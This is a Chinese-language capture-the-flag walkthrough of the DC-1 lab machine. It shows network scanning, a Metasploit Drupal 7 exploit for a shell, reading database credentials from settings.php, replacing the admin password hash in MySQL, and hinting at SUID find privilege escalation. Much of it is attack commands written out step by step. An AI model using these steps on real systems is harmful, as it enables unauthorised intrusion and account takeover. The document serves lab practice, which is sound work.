前言
立个flag:一天一个DC机(滑稽
准备工作
DC-1(nat模式);kali(nat模式)
信息搜集
打开DC-1页面如下:(没给账号密码需要自己渗透进去
首先我们对其进行内网扫描
代码语言:javascript复制arp-scan -l这里我直接浏览器对其访问发现的
Wappalyzer查看其服务信息发现cms是Drupal 7
或者用nmap扫描
代码语言:javascript复制nmap -sP 192.168.232.0/24
接着扫波目录,发现都没啥卵用
代码语言:javascript复制dirb http://192.168.232.141/
漏洞攻击
msf搜索目标cms版本漏洞,实现渗透
代码语言:javascript复制msfconsole
search Drupal
emmm,这里我们就用最新的漏洞
代码语言:javascript复制use 6
set rhost 192.168.232.141
show options
run
芜湖,exit后选择4(第二新的)成功getshell
反弹式的shell,进入交互界面
代码语言:javascript复制shell
python -c 'import pty;pty.spawn("/bin/sh")'
# 产生一个原生的终端
ls
cat查看flag1.txt得到flag1
代码语言:javascript复制cat flag1.txt
Every good CMS needs a config file =》 每个好的CMS都需要一个配置文件 于是乎我们去查查他的配置文件得到flag2
代码语言:javascript复制cd sites
ls
cd default
ls
cat settings.php这里我们成功拿到数据库的账号密码,所以我们就登录进数据库
代码语言:javascript复制mysql -u dbuser -p
根据上面得知的信息输入密码:R0ck3t
show databases;
接着查询数据库信息
代码语言:javascript复制use drupaldb;
接着查表
代码语言:javascript复制show tables;
发现关键信息users,查询里面的字段
代码语言:javascript复制select * from users;
得出账号密码,但是密码是hash加密过的,所以我们只能生成一个密码并得到其hash值进行替换
代码语言:javascript复制php ./scripts/password-hash.sh 123456
UPDATE users SET pass = '$S$DCJ9lkm5vxZFYzL4GsDQnRiKBURAPyzOv7gz3Zb/q9ZrOuZZ7Paf' where uid=1;
最后成功登录进去得到flag3
提示我们:特殊的PERMS可以帮助找到密码-但您需要-exec该命令来确定如何获取隐藏的内容。
通过 find / -perm -4000 寻找权限是-4000的文件即查找有特殊权限的命令
利用find提权获取root权限,得到flag4
